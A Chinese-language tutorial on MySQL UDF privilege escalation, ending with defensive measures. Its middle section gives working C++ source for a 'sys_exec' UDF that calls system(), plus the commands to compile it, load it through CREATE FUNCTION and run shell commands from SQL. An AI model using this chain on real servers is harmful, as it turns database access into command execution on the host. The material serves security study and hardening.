MySQL UDF提权

MySQL的用户自定义函数（User Defined Function, UDF）是指用户可以编写自己的函数并将其添加到MySQL数据库中，以便在SQL查询中使用。然而，如果管理不当，UDF可能成为系统提权（Privilege Escalation）的工具。本文将深入解析MySQL UDF提权的机制、实现步骤、防范措施及其实际案例。

一、UDF提权概述

1. UDF的工作原理

UDF是用户编写的共享库（如.so或.dll文件），可以通过MySQL加载并在SQL语句中调用。这些函数通常是用C或C++编写，并通过特定的接口注册到MySQL中。

2. 提权的原理

提权是指通过某些手段获取更高权限的操作。利用UDF进行提权，攻击者可以将恶意代码作为共享库加载到MySQL中，并通过SQL语句执行这些代码，从而获得系统的高级权限。

二、实现UDF提权的步骤

1. 编写UDF

首先，需要编写一个恶意UDF。例如，一个能够执行系统命令的UDF。

#include <mysql/mysql.h>
#include <stdio.h>
#include <stdlib.h>

extern "C" {
    my_bool sys_exec_init(UDF_INIT *initid, UDF_ARGS *args, char *message) {
        return 0;
    }

    void sys_exec_deinit(UDF_INIT *initid) {
    }

    long long sys_exec(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) {
        if (args->args[0]) {
            system(args->args[0]);
        }
        return 0;
    }
}
​

2. 编译UDF

将上述代码编译为共享库文件。例如，在Linux上编译为 .so文件：

g++ -Wall -I/usr/include/mysql -fPIC -shared -o sys_exec.so sys_exec.cpp
​

3. 上传并加载UDF

将编译好的共享库文件上传到MySQL服务器的插件目录（通常为 /usr/lib/mysql/plugin或 /usr/lib64/mysql/plugin）。然后通过MySQL命令加载该UDF：

CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'sys_exec.so';
​

4. 执行命令

加载成功后，可以通过SQL语句执行系统命令。例如：

SELECT sys_exec('id > /tmp/mysql_priv_test');
​

这条命令会将 id命令的输出写入到 /tmp/mysql_priv_test文件中。

三、实际案例

假设我们已经成功加载了 sys_exec UDF。可以执行如下步骤进行提权：

-- 创建恶意UDF
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'sys_exec.so';

-- 使用UDF执行系统命令
SELECT sys_exec('id > /tmp/mysql_priv_test');

-- 检查输出结果
SELECT LOAD_FILE('/tmp/mysql_priv_test');
​

四、防范措施

1. 限制文件系统访问

确保MySQL运行账户对文件系统的访问权限受限，尤其是对插件目录和敏感目录的写权限。

2. 使用强密码和权限管理

为MySQL账户设置强密码，并严格控制账户权限，避免低权限账户拥有CREATE FUNCTION权限。

3. 定期检查和更新

定期检查MySQL服务器的插件目录和数据库用户权限，确保没有被加载的恶意UDF。同时，保持MySQL服务器和操作系统的最新更新。

4. 使用安全插件

使用MySQL的安全插件（如MySQL Enterprise Firewall）来监控和防御潜在的攻击行为。